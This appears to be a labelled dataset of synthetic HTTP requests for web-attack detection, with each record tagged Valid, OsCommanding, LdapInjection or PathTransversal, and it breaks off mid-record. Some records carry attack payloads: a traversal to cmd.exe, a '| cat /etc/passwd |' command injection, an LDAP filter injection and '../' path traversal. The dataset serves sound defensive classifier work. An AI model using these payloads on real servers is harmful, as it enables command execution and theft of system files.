Cookie: TeoTneWj3=0Nau;Tllnssaew9jtsd=g)6 zuan9navcO I;1qSJ1=aodu;ouIynxipet=1671;CIrbgsoundTMGhFAhttps=nean;wsniatiuebrt=tlsieey~fscripty
Cookie2: $Version="07"
Date: Sat, 05 Jun 04 23:45:37 UTC
ETag: "86dJPrYDm_WxIHbzpK"
Expect: rnms2it=eIumt;ufdtRd
From: tztba@mlyibacoy2.cz
If-Modified-Since: Mon, 20 Mar 06 01:38:25 UTC
If-Unmodified-Since: Thu, 11 Oct 07 22:21:16 CET
If-Match: *
If-None-Match: *
If-Range: "C1@BMXLuaOKlUiH"
Max-Forwards: 15
MIME-Version: 0.5
Pragma: ni7='asnras'
Proxy-Authorization: dq3Bsa A2qrtl=9wki
Authorization: rtsr 0dSh=iih9
Range: 041-
Referer: http://www.mznghh.cz/Eijyddgo/f6aeIxi/IjAe6hpe.sh
TE: gzip,trailers
Trailer: Host
User-Agent: r99rxnIdi/8.8.0
UA-CPU: MIPS
UA-Disp: 3281,342,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5187x1770
Via: 6.2 www.Efmd.gif:074
Transfer-Encoding: snihd; NRa9nt=cbchod
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25955
Start - Id: 5373
class: Valid
PUT /bSYYeco/nn0ZixtR7bZykMJY/gKeqISPX9H/dSexfeHkwVg94vJuy-/fPhU0otns/20Cb81/fpDnmGl5N8B6/td@c3psA-e7.cgi? HTTP/1.1
Content-Length: 27
Content-Language: t5sT
Content-Encoding: identity
Content-Location: /cLltmntl/honE.wav
Content-MD5: d2F0M25mYmlzb251N0lpbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Aug 04 22:38:11 GMT
Last-Modified: Sun, 16 Jan 05 01:17:21 GMT
Host: 89.87.50.115
Connection: close
Accept: video/quicktime;q=0.0, video/*, text/*;q=0.5
Accept-Charset: ks_c_5601-1987;q=0.2, x-mac-icelandic;q=0.0, iso-8859-7;q=0.8
Accept-Encoding: identity, deflate;q=0.1, identity;q=0.5, compress;q=0.1
Accept-Language: *
Cache-Control: min-fresh=317
Client-ip: 10.94.7.247
Cookie: sh5IeQteZtut=mio3ai;ageht0edaDeudhr=362082830;143oeqU1she4tcs=epWS
Cookie2: $Version="038"
Date: Thu, 12 Feb 09 17:31:51 GMT
ETag: W/"AO-wdC3pC_ZUUh0kR"
Expect: 100-continue
From: rdbt@eordwt.ch
If-Modified-Since: Thu, 03 Aug 06 22:36:02 UTC
If-Unmodified-Since: Sun, 26 Jun 05 19:01:27 UTC
If-Match: "u_mPjut.5FG@coOJUo"
If-None-Match: "1CxokObIcapl1Va"
If-Range: "Wq2Zu@-Q4gvpG@BwZQj"
Max-Forwards: 82
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM cm9kYXBvdHVyanlyaG90UzdyaHRzY2Fla2VyZWFhcndweWlrcnJkM2E=
Authorization: Basic YzB6aGVveDphaGR0b24=
Range: 429-04732,0-0702,6-47430
Referer: /pefcb.tar.gz
TE: trailers
Trailer: Pragma
User-Agent: a8xfJAKyWh http://www.nexU.cz
UA-CPU: x86
UA-Disp: 904,156,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 007x8585
Via: HTTP/0.2 www.aueKlsg.jpg, 2.6 10.124.14.236:666, s9oaa3/9.2 142.25.172.233
Transfer-Encoding: compress
Upgrade: m4rr/9.8, leutb/5.3, pbd/7.7
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 028740747069773
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

fohis=8&nndQuiCea5=itesrtiu

End - Id: 5373
Start - Id: 16476
class: Valid
GET /V6LsLW5L.jpg?Usbf=nl+httpcNs%26enw%3F%40sock_streamtsnpasswd&MobVRL5=boot.inif%3E&th62pSRaqpsrvh=4454069&gseorcesc=ft3w%2Fxr&ermluaosye=l4zIcente&09FfOu=oO&nvEofepqj76=cwaefed0ar6Naiesa&m.B3ls7y4UC5O=nsy%28adoyeadsdbh5&tihsgn=iframe%7E&n7LhqKd=7346&Ii3ogeh5ey=26&uedeeeiidie=9674301&rneGh9iytbdR=aubn0iAfkYenn&esruSmoihSo=nefalpduml7d HTTP/1.0
Host: 169.168.233.63:80
Connection: oiavut6v
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 116.86.88.217
Cookie: Mem8se=em3eewmgformpa%ui :woptih;ti=jn;ocideeadTksaeus=tetc)ah;aetaaxnef= %sau\/is;ilvvancsi5=nytr;sp7emoguxeeu8=DszaUbesitip3
Cookie2: $Version="75"
Date: Wed, 24 Mar 04 12:39:37 UTC
ETag: W/"7ZIa@ypOpsN0Ej0_f"
Expect: ugbrs0=oL6tA;qooopA
From: enneeci@ehirrnmall.it
If-Modified-Since: Wed, 15 Nov 06 17:12:45 CET
If-Unmodified-Since: Sun, 30 Apr 06 15:12:13 GMT
If-Match: *
If-None-Match: "5JNyOOXsSqIE1jrX5"
If-Range: "5oEp8CvexltzMBUhVu"
Max-Forwards: 1035
MIME-Version: 3.8
Pragma: arstduet='sU'
Proxy-Authorization: Basic b2FsZjpiZXZldGU=
Authorization: NTLM ZDBldGFoYzlsdHRpZTlkaXRuc2d3cmVvemVockVxdEdn
Range: 367-465064
Referer: /osesna/wmao2u/nmil.fgf
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/3.6 (compatible; ob2eaaeibh; SunOS sun4u; yiknW; iy6l0)
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 714x1442
Via: HTTP/1.0 www.mps3.html
Transfer-Encoding: gzip
Upgrade: ry7ni/4.7, twhs/6.6, tDt/4.9, jtn/8.9, roho/9.5
Warning: 543 www.tjetzkwe.png "ctadem" "Wed, 01 Aug 07 06:58:08 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16476
Start - Id: 43888
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 241.59.70.47
Connection: keep-alive
Accept: image/png;q=0.6, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: leei-soE;q=0.5, eutT8-f;q=0.5, s6idns-uoS;q=0.2, xrtsshh-eel9;q=0.8
Cache-Control: no-transform
Client-ip: 132.194.132.1
Cookie: baibomretuek=YsxxsaEoai;HKq2Yt8=75848432;srIjciMhitluy=i8;aOk4zsjdottae=]r[dhpnl
Cookie2: $Version="62"
Date: Wed, 11 Jan 06 17:11:54 UTC
ETag: W/"d-3S9kQ58tYQbNiwAuAI"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Wed, 26 Sep 07 18:05:40 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: "csX.cEIoKRjMNB8R"
Max-Forwards: 6
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic cjh0b2JoTDpOaXRp
Range: 3121-127,822-
Referer: /8e9tad.shtml
TE: chunked,gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/2.0 (Windows; U; WinNT 0.4; 5h-Sd; rv:8.0.2) Gecko/12538811
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: np1euh; iwnbdsd7=rBi7ta
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43888
Start - Id: 7247
class: Valid
POST /fuh/hNFlZlmlKKh2oMMxrKG/to99Deaiadr/77YeW8HkQ0qe/eLy2g3WR9Y@Crn/tiina41bNt.asp? HTTP/1.0
Content-Length: 125
Content-Language: ak3edu,Suse,Gl
Content-Encoding: compress
Content-Location: /Jurhh/alj7t/catr/neEs.php
Content-MD5: dGRpRHRob2VoYWxpM2Fibg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Apr 08 16:03:17 CET
Last-Modified: Mon, 14 Mar 05 03:56:52 UTC
Host: www.iRtt.st
Connection: keep-alive
Accept: text/xml, audio/*, text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yHlT-89ft;q=0.2, 1Hjcsts2-bahhonn4;q=0.6
Cache-Control: n=s
Client-ip: 157.80.150.41
Cookie: efotci=0aa47ezTsgraxkCe;eot6roesH=1hal$uwefoo+(;tSutfs=83;nss6dzd=5cwel3du;FIFG73Ko3u=ns;9exec2e5IDu@3=7 spitmpsdeleteL
Cookie2: $Version="8"
Date: Sun, 11 Jan 09 07:55:53 CET
ETag: "LSPiBQAuZEWmmlnvEFPd"
Expect: hindsed=oETreev
From: hmr2nw4d@stiimunlz6.cz
If-Modified-Since: Thu, 21 Oct 04 11:14:34 GMT
If-Unmodified-Since: Mon, 17 Nov 08 24:23:05 GMT
If-Match: "FKxwsBjv5wDvyfqVp4h"
If-None-Match: *
If-Range: Fri, 06 Jan 06 06:02:21 UTC
Max-Forwards: 420
MIME-Version: 8.1
Pragma: esR='aeyane'
Proxy-Authorization: Basic bnRkZVd2OnVpaE9Fc2Fu
Authorization: DsrL ossoa4tT=eyriIn
Range: -805
Referer: /eLidtel/e9ias/nBdl9a1t/sebss/iidnns.asmx
TE: trailers,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: lojsodtuihbbfsnle
UA-CPU: StrongARM
UA-Disp: 3266,331,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: 7.2 8.83.242.226
Transfer-Encoding: esms
Upgrade: l3se/5.2
Warning: 727 www.dnda.gif:0568 "si7of2abo8tgnymy" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ------------------------------
~~~~~: ~~~~~~~~~~~

st0uaZx2cgasT=el2&m3r=e9gSQ6il59RG&2sethhhtIlr=974391&@Vqf_q_1SS=Eessyon18aohsctmRH&awnjaedtaosoo9=mcb$&seeots9d2pO=eP7.zFv

End - Id: 7247
Start - Id: 9966
class: Valid
GET /bidt/gelhwn/aYxQ3e8RtE/ez0nebeoas/e-sY33ZQrqzYSF1b/aDG/eysaoletlrtmce/di@VP/2pnmnreofy/mexe4ma6.exe?tr=mo6ot&bFTofjopt2xdt=i+A HTTP/1.1
Host: 17.89.101.63
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.3
Accept-Encoding: 
Accept-Language: jna-Ic9Imwer;q=0.1, mhete-Fafervih, w-s;q=0.9, 7i3a-peten
Cache-Control: only-if-cached
Client-ip: 244.192.164.169
Cookie: lsi9cau=rkiG8Q_o
Cookie2: $Version="573"
Date: Mon, 21 Apr 08 12:56:04 GMT
ETag: W/".4Z787.Yf8F0nvU"
Expect: iiapa
From: gaacps@toci.org
If-Modified-Since: Tue, 26 May 09 01:10:49 GMT
If-Unmodified-Since: Mon, 21 Sep 09 22:42:15 CET
If-Match: *
If-None-Match: "UGEczkyAdJN7f8OyTpgE"
If-Range: Sun, 23 Sep 07 09:37:52 UTC
Max-Forwards: 89
MIME-Version: 9.2
Pragma: tnrlghfi=e
Proxy-Authorization: Digest nonce
Authorization: NTLM c3p0ZWNUbnJlY25zamJzZmV0ZXJpZ2hub2VlYWxmaWlsZWF2ZnkyVjFpQVIxMA==
Range: -96
Referer: /Antaom/ieaix/TgOe/nwnuys0.swf
TE: deflate;q=0.0,gzip
Trailer: If-None-Match
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 5.7; am-Sf; rv:3.7.6) Gecko/35206387
UA-CPU: MIPS
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 596x007
Via: FTP/2.0 www.wfoiatnq.html:733
Transfer-Encoding: compress
Upgrade: b2bhql/3.8
Warning: 614 www.ybpt.js "ithwrochasw4rgehd" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 7198158285326670
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9966
Start - Id: 4117
class: Valid
POST /wsu.BW0h9xVIsjdPof/gw9n.tiff? HTTP/1.0
Content-Length: 75
Content-Language: madSr
Content-Encoding: deflate
Content-Location: /6t5ie/eiljety1/ete5e.php
Content-MD5: YWxSbzlnbmU2aWkyb3Rhcg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 04:01:16 UTC
Last-Modified: Wed, 06 May 09 13:25:21 UTC
Host: www.ocvgaaaomg.it
Connection: Ooyl
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesetrad, windows-1253;q=0.6, x-mac-arabic;q=0.1, iso-2022-kr, hz-gb-2312;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=469
Client-ip: 90.59.196.121
Cookie: ahw0tniElT3t1=tlsuisNdaiownf;x3bqJljjidN6=ecRbe3
Cookie2: $Version="692"
Date: Fri, 13 Mar 09 22:26:05 GMT
ETag: "49JkisqGq9mrDE6ePh6a"
Expect: 100-continue
From: tEpEp@tir3gian.cz
If-Modified-Since: Mon, 06 Apr 09 20:57:27 CET
If-Unmodified-Since: Fri, 04 Aug 06 20:10:57 UTC
If-Match: "mEtTyOIEZU5sbaIqKWRk"
If-None-Match: *
If-Range: *
Max-Forwards: 23
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Basic aXNmMzp0eDJueWU=
Range: 149-,88457-
Referer: /szhlee/oadp8ar/y4lVtd0/2nmiIneP.html
TE: gzip,deflate,trailers
Trailer: Pragma
User-Agent: aisgNnitti1enw
UA-CPU: StrongARM
UA-Disp: 6182,3319,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5654x5319
Via: 7.2 82.143.216.4, 6.2 169.74.154.61, FTP/5.9 8.170.170.18
Transfer-Encoding: deflate
Upgrade: txgQ/6.8, rwt/5.6, p7law4/7.6, Pi4lm/5.6
Warning: 595 www.endswe0t.htm "rojqzsooogwsngCtsaaa" 
X-Forwarded-For: 116.192.98.218
X-Serial-Number: 13901599653
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

l4iuxarnTmT=974667&vfqetakwbxc=q%p ~evaltErzmochartnrm4w&oaf2g=35403927

End - Id: 4117
Start - Id: 27546
class: Valid
GET /yI2IuU0lmNw90n09/oNoto-df74N1DNkmEQJS/rn4I5dt4w/vCZ40p_6mq_pe.css? HTTP/1.0
Host: www.ofic.com
Connection: iolur
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress, compress;q=0.2, compress
Accept-Language: bo5feyrt-OewC;q=0.9
Cache-Control: min-fresh=86
Client-ip: 40.149.99.104
Cookie: 7aenntezoph=8651;AUpositionMSWckLA=660;dNnoeztya3s=sG3;gfhniNihah=enodea OEdaH
Cookie2: $Version="9"
Date: Tue, 18 May 04 05:36:53 GMT
ETag: "Lbhp6ixtHh8npbEVftHT"
Expect: 100-continue
From: diTeooq@TnmlsC.net
If-Modified-Since: Sat, 31 Dec 05 01:16:04 UTC
If-Unmodified-Since: Sat, 13 May 06 03:45:50 CET
If-Match: "-9fijHkjy492OEO9V5"
If-None-Match: *
If-Range: *
Max-Forwards: 2596
MIME-Version: 4.1
Pragma: taako4hr=ftaje
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dWxvZXI6emVoQWRy
Range: -57147,586891-,-6
Referer: http://www.harhaw.fr/Lohp3k/n1astb/trrsyMf/noaaa/esa0t.pdf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.9 (compatible; MSIE 9.4; Win 9x; jrw51Kds; rnsanr; DamrLhdt)
UA-CPU: Sparc
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: 9.0 6.172.84.232, 6.4 67.187.101.252
Transfer-Encoding: compress
Upgrade: p9oeKS/3.3, hrTbcn/5.9, it5rl/2.1
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27546
Start - Id: 27336
class: Valid
GET /aRarr1jZAZM/iJXU/.Di/5scweh.eH_XlgQ7/edqOyio/nd0mle9w0ay5xuh/vAJr24d/e1UKELTmvehc_s/15IL6vposition/suo5umemi/2idJ.3.NO-ENZ4/sRnI4do0AGb.swf?tsCu7luhqBchtM=+eo&ictwru=624676&ndaxaauta=hCd7sZa&b0-L_=gkwhaving1of+al&tn1eGrog=tah%7Es%40&-q@RnIHpzNP-=363187648&mphC=a8R.Tw0LiM HTTP/1.1
Host: 9.95.114.169:9
Connection: close
Accept: text/xml;q=0.4, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.0, deflate;q=0.4, gzip, deflate, compress;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 158.76.53.178
Cookie: Eiw=456069;eudtsrt=etea
Cookie2: $Version="98"
Date: Sat, 22 Oct 05 09:22:06 GMT
ETag: "1miNIizWdS3oANro"
Expect: 100-continue
From: toe4iu@onagtDi.st
If-Modified-Since: Tue, 27 Dec 05 08:43:51 CET
If-Unmodified-Since: Wed, 28 Nov 07 10:54:00 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Jun 08 19:13:52 UTC
Max-Forwards: 1
MIME-Version: 1.5
Pragma: dPiua0=oocTdF
Proxy-Authorization: Digest nc=a9cB8b28
Authorization: Digest response="0BfcF1A50BCa10BC884aF1cBBDbC634a"
Range: -49505
Referer: http://www.nqSe.de/yewmfco/ieSlio/E8uew/o0osfi.mspx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: aqHwXkR http://www.vtio6hv.de
UA-CPU: 68000
UA-Disp: 3109,349,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3599x969
Via: HTTP/4.4 97.76.223.135, 5.6 178.120.167.110, 8.8 www.woti.htm
Transfer-Encoding: identity
Upgrade: oygdhG/5.2, mkl/7.7, atrtbx/4.3, rRu4lt/4.7
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27336
Start - Id: 37664
class: LdapInjection
PUT /wowWoeyl0r/jitb4ehtebwvg0/rkg2ig5Fwx7@q@Q1@/i2oieaEpllGrt9as/eretnejstr2tai/eiIaieateeh2tytt6tn/uxVzTyjFMJylCQuhC@h/i6alairiezsljweTlea/rmspDypoeerwn6nse.mdb? HTTP/1.1
Content-Length: 379
Content-Language: tfiz,o,ztsQ5Xe
Content-Encoding: compress
Content-Location: http://www.nostdt.net/agsi/imbn/yhhtl/earnetaD.asmx
Content-MD5: c2Vlc3JvZG5zb3RrbXZJbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Tue, 15 Feb 05 14:24:37 GMT
Host: www.iiIj.fr:91
Connection: close
Accept: */*
Accept-Charset: gb2312, cp-936;q=0.9, iso-10646-ucs-2;q=0.0, x-mac-arabic;q=0.9, iso-8859-15
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 88.224.210.21
Cookie: lF3cget=7190;9g1GcDQLR=ae;pyaqilhrte8ln=2128070;dlbee=is9teqiCsn=o-samprh;y5eito=bo4aSqs1;iphl8eilrs=7972
Cookie2: $Version="657"
Date: Tue, 23 Mar 04 23:13:34 CET
ETag: "L1wKH0qc0h5OgNanY"
Expect: raso5lm
From: TttDoe@rczep.it
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Tue, 06 Apr 04 07:27:56 GMT
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: *
If-Range: Fri, 06 Jun 08 07:54:07 GMT
Max-Forwards: 7858
MIME-Version: 2.7
Pragma: sClnnre=9
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /eSGp/nelj4.cgi
TE: deflate;q=0.0
Trailer: Authorization
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 7.9; 9e-iO; rv:9.1.4) Gecko/39572474
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 1.2 www.sgqnnra.js
Transfer-Encoding: gzip
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

chssIeTisies5=fievES8&trtsBohebnthl=gt+hstliframeimtmpio&nct1xcnheneA=vs+gexecxeyu%3Ey%3Fne+lks7&ircaOotrdi=80602&ub1t8thn=aw6wfBZtu4Z&r4heOot9ewddtsA=script-flse&liwhioahd1eaHyy=hmoGvxgIfi&8BMmk%u2=bd5nert%3A&stdintumbHpx._UV=eE_aYNOSPI3&dpXttq3=cGV%40_d%40G8J&N3yltoadirLicS=f8n&oBxGdw0GPhW=96%29%28%26%28objectClass%3Dc1sk%29%28%7C%28sn+++%3D++avke%29%28cn%3DaNst+++++J*%29%29

End - Id: 37664
Start - Id: 26341
class: Valid
GET /nietEodEechEs/mWGh3IS7/qessc6/ffnnh25nt/8Y/t0ewq8aS@t/eFTAq722VpAGuVp./wp-VvdMl6eESB/ekc/hrhkJrEeEonocnml/iseowr7tv.css?hh24e=sE5R4I&at=omWBHkpv-OH&bvmadIt3H=qenht&awPodkafysoyTl=ftwfdh7O&nA=rDz0&eEdRpilionee=46306130&nm6npoent8fdtm=94988&b_c0rm=isiosyqkta+mgia+te&eaqirn=z+o&xkrANl=i%3F7AeLw4ltSilor HTTP/1.1
Host: 246.130.135.175:2
Connection: sx6t4tpG
Accept: audio/*;q=0.2, image/jpeg, text/html;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 154.55.13.229
Cookie: l09e4hefb7=7302770;LdeK=blsrGR;Sodoidr=and;97BmochapLO@-T=hqe45rAxc/t
Cookie2: $Version="378"
Date: Tue, 31 Mar 09 16:41:25 CET
ETag: W/"B9apA69xetbtlxTa"
Expect: roudurt
From: eetns@gfcsenLkB.net
If-Modified-Since: Fri, 23 Jan 09 15:26:11 CET
If-Unmodified-Since: Tue, 05 Jun 07 14:39:20 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Jun 06 03:01:03 CET
Max-Forwards: 272
MIME-Version: 9.2
Pragma: sc=held
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Digest response="aBA7234B3c88a7dbF0E3abBCC587A716"
Range: 41-,127-,9-039
Referer: http://www.zuiyk.be/nhooS0eh/nese/ntC6bSk/tmtictT/Oaais.mpg
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/5.4 (Windows; U; Win 9x 9.0; 9n-N2; rv:4.4.2) Gecko/75538671
UA-CPU: StrongARM
UA-Disp: 417,8223,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 917x537
Via: 7.7 www.85dff0c.png:3, yesf/6.8 www.mguPucE.jpeg, 2.2 www.d1l2em.html
Transfer-Encoding: knera; i4tnI=dc9iopt
Upgrade: 9joysm/9.5, ucehec/7.9, nRtrye/6.5
Warning: 815 www.rbtyila5.css "ciOtmopyFf" "Tue, 22 Jan 08 03:00:01 CET"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 908761770500
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 26341
Start - Id: 44683
class: PathTransversal
PUT /edogh/SshP85lCEmxI/tLyp.EH_m9S2/T4Bav.html? HTTP/1.1
Content-Length: 186
Content-Language: teEnrseU,Ueagqhim
Content-Encoding: gzip
Content-Location: /p3ct/vvHoto/ksne.tar
Content-MD5: eTVqYnN1RGphZWJpZno4Mg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Sep 08 04:18:23 UTC
Last-Modified: Sat, 03 Sep 05 22:50:28 CET
Host: 76.102.92.166
Connection: keep-alive
Accept: video/mpeg;q=0.9, image/*, audio/*
Accept-Charset: iso-8859-4;q=0.4, cp-936, us-ascii;q=0.4, x-mac-icelandic;q=0.6
Accept-Encoding: compress, deflate, deflate;q=0.9, compress, deflate;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 209.36.114.208
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="2"
Date: Wed, 16 Jul 08 24:45:28 CET
From: lhlpdrcp@ehieTi.gov
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Mon, 06 Dec 04 24:58:58 GMT
If-None-Match: "u72unQyI2RbxM0ErdJ"
If-Range: *
Max-Forwards: 138
Pragma: fi54='di'
Authorization: Digest nc=F2bf69C0
Range: 2168-,8-1607,73-
Referer: http://irlhRnt.it/ertatm.nsf
TE: trailers,gzip,deflate
Trailer: If-None-Match
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 8.8; pg-tn; rv:7.4.5) Gecko/75725001
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 562x3540
Via: 9.5 www.N0nC0n.gif, 9.2 205.210.10.205:035, HTTP/8.3 82.108.16.150
Transfer-Encoding: gzip
Upgrade: 2dgtes/0.6
Warning: 690 www.maefe.png:3036 "oEisin22ih1tenabt" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

bi=92&thueafteeRr2n=../../../usr/dsqqdsqsd.xml&Olpasswd.Ww.Bo=310&ofkhpe3s5yi=gQaMFIQI&d1LTy=0318219&tjr3hheio8hE=767&sPR8Z2r=c3mDx@@&AeqsRtnao=rosftrEs kel:ee&ee4cjoea=669

End - Id: 44683
Start - Id: 36788
class: OsCommanding
GET /bEwsW/urHalmltriml4ynihrya/uM1kW8Qh5s4mI4d/DJdGCihi1F5wp-GB.jpg?.MH4echo-yDeX=960&nttmRlyywLv=%7C+++++cat+++++%2Fetc%2Fpasswd+++++%7C&oNtlh84egpwa=tCftstwrniunrlI0re&be97seieyqynres=eihttp&cmh=bb7st&lbEHwh=eezc&agitssmsirU9=elQL0-p&eacsurnleao4l=ni&agc=21985&aOwp=4836 HTTP/1.0
Host: www.eor4.fr
Connection: 2nrtl
Accept: video/quicktime, audio/*;q=0.5, video/mpeg
Accept-Charset: iso-8859-4
Accept-Encoding: *;q=0.2
Accept-Language: tf-i9tcp;q=0.3, lesCiwE-s;q=0.5, s4or2et-2;q=0.4, e-nnyzr
Cache-Control: oelfho=ot
Client-ip: 183.149.193.186
Cookie: pis4bedhoa=eezeonihhtaccesO;di=loegtu)Cre|n;noeOw=853;yecLrE=eqr
Cookie2: $Version="538"
Date: Fri, 19 Nov 04 23:12:37 GMT
ETag: W/"WNaw5RqhVgLPmf0nz7aY"
Expect: yblD
From: RdaleTeo@igeTtd.be
If-Modified-Since: Fri, 10 Feb 06 04:23:37 GMT
If-Unmodified-Since: Tue, 29 Mar 05 03:33:18 GMT
If-Match: "_SuHphTJ4Mr6_9Sh"
If-None-Match: *
If-Range: *
Max-Forwards: 112
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nc=1aE81C6d
Authorization: citeml sTeoegdo=Daea
Range: 907-5,-807
Referer: http://tmnie.net/eOnls/e5nhy/snceie.cfm
TE: trailers,gzip;q=0.4
Trailer: If-None-Match
User-Agent: evwesona (etoANqf1; rxl@2o; nJj29DVb.; 66DWRSf6bb; xo6PW4df-)
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/6.5 www.elie.jpg, HTTP/5.8 www.tmtoh.png, 5.2 www.ucbhroj.png
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 133 www.UaEc.shtml:24599 "tmgftooT" 
X-Forwarded-For: 140.59.115.43
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36788
Start - Id: 46106
class: PathTransversal
POST /nbu3xssT6/IV-boot.iniF0kgrVqQlocationu/hfZt3FYWsB/reoani.jpg? HTTP/1.0
Content-Length: 123
Content-Language: ei,lydOSMul,ui
Content-Encoding: gzip
Content-Location: http://tCtkMi.biz/ha5ag/eAf4Ua/sivxak/hglle/yeae.png
Content-MD5: dGZoY3VMbW9jRWF4aWhkZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jul 09 17:14:25 CET
